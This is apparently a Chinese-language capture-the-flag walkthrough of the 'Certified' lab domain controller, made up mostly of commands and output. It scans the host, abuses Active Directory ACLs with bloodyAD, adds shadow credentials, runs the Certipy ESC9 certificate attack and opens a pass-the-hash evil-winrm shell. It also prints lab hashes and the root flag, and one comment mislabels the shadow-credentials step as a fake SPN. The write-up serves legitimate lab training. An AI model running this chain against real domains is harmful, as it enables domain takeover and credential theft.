本文介绍了如何通过信息收集和漏洞分析,使用judith.mader用户进行特权升级和根权限获取。首先,通过Nmap扫描获取目标主机的信息,确认开放的端口和服务。接着,利用bloodhound-python工具收集域信息,并通过权限提升的手段将judith.mader用户添加到management组,获取更高的权限。最终,通过Certipy申请证书并成功以administrator身份进行身份验证,获取根权限。文章详细描述了每一步的执行过程和命令,展示了如何在Windows环境中进行渗透测试与权限提升。
Information Gathering
# Nmap 7.98 scan initiated Fri Jan 2 03:47:32 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.14s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-02 10:17:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/2%Time=69573FE9%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-02T10:18:15
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h29m38s, deviation: 0s, median: 6h29m38s
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 2 03:49:17 2026 -- 1 IP address (1 host up) scanned in 105.83 secondsVulnerability Analysis
judith.mader:judith09
首先校准时间
➜ Certified sudo date -s "$(nmap -p 445 10.10.11.41 --script smb2-time | grep 'date: 2'|cut -d ' ' -f 5)"
Fri Jan 2 10:29:36 AM UTC 2026bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -dc 'dc01.certified.htb' -c all -ns 10.10.11.41 --zip 收集域信息
judith.mader user WriteOwner Management group GernericWrite Management_SVC user GenericAll CA_OPERATOR user
Exploitation (User Flag)
# 将management组的所有者改为用户judith.mader
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' set owner 'management' judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management
# 给judith.mader权限
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add genericAll 'management' judith.mader
[+] judith.mader has now GenericAll on management
# 将judith.mader纳入该组
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' judith.mader
[+] judith.mader added to management
# 使用 ldap 模块查询 judith.mader 所属的组
nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --query "(sAMAccountName=judith.mader)" "memberOf"此时我们就可以利用GernericWrite Management_SVC user
# 给用户Management_SVC设置虚假的SPN
➜ Certified bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add shadowCredentials 'management_svc'
[+] KeyCredential generated with following sha256 of RSA key: 27e6dac6b3bf03d0ae9997665206b05b54de55bd629b95d8acd1f3e090c4248f
[+] TGT stored in ccache file management_svc_Df.ccache
NT: a091c1832bcdd4677c28b5a6a1295584Privilege Escalation (Root Flag)
➜ Certified certipy find -u ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -vulnerable -stdout得到ESC9
更改upn为administrator
➜ Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : administrator
[*] Successfully updated 'ca_operator'申请证书
➜ Certified certipy req -u CA_OPERATOR -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' -debug
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'还原upn
➜ Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'CA_OPERATOR@certified.htb' -user 'CA_OPERATOR' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : CA_OPERATOR@certified.htb
[*] Successfully updated 'ca_operator'进行身份验证
➜ Certified certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34➜ Certified evil-winrm -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -i certified.htb
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
25313f415eb17c6f9856e10e820d9769